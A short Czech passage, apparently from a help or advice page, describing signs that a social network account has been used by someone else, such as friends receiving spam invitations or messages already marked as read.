Pokud vaši přátelé obdrželi zprávy s reklamním obsahem nebo pozvánky na stránky třetích stran, uvidíte zprávy a oznámení poprvé, ačkoli stránka ukazuje, že byly zobrazeny atd. pak byla vaše stránka použita, když jste byli pryč. Nemusí však být vidět online. Existují programy, které skryjí přítomnost uživatelů v síti.